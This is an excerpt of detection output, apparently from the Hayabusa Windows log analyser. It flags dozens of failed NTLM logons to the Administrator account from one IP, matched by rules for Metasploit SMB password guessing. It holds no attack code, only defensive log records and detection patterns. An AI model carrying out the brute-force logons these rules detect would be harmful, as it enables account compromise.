NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:53.919 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:53.964 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: WxVdhpR7ZnAluurU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:53.964 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:54.016 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gZjAZb9bQKZjwL8u : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:54.016 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:54.066 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: aKyLX5ChpgBuFEbr : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:54.066 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:54.112 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 49t2xJvH2yHcyHle : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:54.112 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:54.168 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: sg9Z6Pyix2UkMolr : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:54.168 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:54.210 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0NN2olYn97ZoYCja : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:54.210 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:54.249 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: S98j54bDGsz0k6g9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:54.249 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:54.284 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XxFEw9s0nnEQGzUN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:54.284 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:54.342 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wSswFHFSlqcQd47k : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:54.342 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:54.385 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7icutlVIWSLZJszQ : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:54.385 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:54.440 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DSwyugYn0n3i5f25 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:54.440 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:54.473 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: RmBaLCUcR7TmixTy : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:54.473 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:54.524 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1oOBz2NQSCdTwa7V : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:54.524 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:54.582 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: O4tU1LPF5DRW9Vm0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:54.582 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:54.633 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SRsSNqPYruWBzp2n : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:54.633 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:54.684 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3JZhBLzt4af1VtCU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:54.684 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:54.729 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: dFLZIKSDBvBaWq59 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:54.729 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:54.774 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: guAG4ZTFMjZAxp1A : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:54.774 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:54.817 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Yd04xsSIdiczICeG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:54.817 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:54.865 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Cx3i1URKPhC6KWI7 : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:54.865 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:54.914 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Npc6IS27HsWP3JA9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:54.914 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:54.963 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KIBnr0eZ1bHHGokW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:54.963 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:55.013 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6gTTrUVjpPU80LlC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:55.013 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:55.078 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FZlmUbCNAJga24JH : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:55.078 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:55.136 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Zf3aSGBMe97VujaH : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:55.136 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:55.184 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8bx7ZM77aDG7y6Lh : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:55.184 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:55.220 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: BnHHAClMwyqA3TTI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:55.220 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:55.260 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 00ibRrYvnFt5w9X0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:55.260 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:55.300 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VglTKbnLVFvHZHzQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:55.300 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:55.358 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3NwX0sDFwHQG7Tkq : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:55.358 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:55.413 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3mMx3M1zurKMBzyj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:55.413 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:55.468 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: sH7b8P0O0uea3PlN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:55.468 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:55.530 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: TJcrTyBPuX0TcvOT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:55.530 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:55.574 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: kwuZIQAL3BmJnPsJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:55.574 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:55.620 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: lxgAfsnH6YWLRD0a : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:55.620 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:55.680 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ttBOjzmEBjr9W2QW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:55.680 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:55.732 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: FPDKGGYkJQeWgtUf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:55.732 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:55.848 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: nSoJWqS6YPbpCiBf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:55.848 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:55.887 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Pr2oMzxv7pcDfsgw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:55.887 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:55.940 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jiopmZAMpwg3dEaA : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:55.940 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:55.989 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tG1Bxm0lt3vwoO5V : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:55.989 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:56.043 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 9Kf5AaQX7KOVAIAN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:56.043 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:56.097 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FW9nBirBTHIXIrfp : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:56.097 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:56.148 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: S9qKcDhfcf2kMk00 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:56.148 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:56.184 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 9NgStzf2xQ4P7q0d : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:56.184 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:56.225 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: j9mCrjQykX06IcMf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:56.225 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:56.256 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
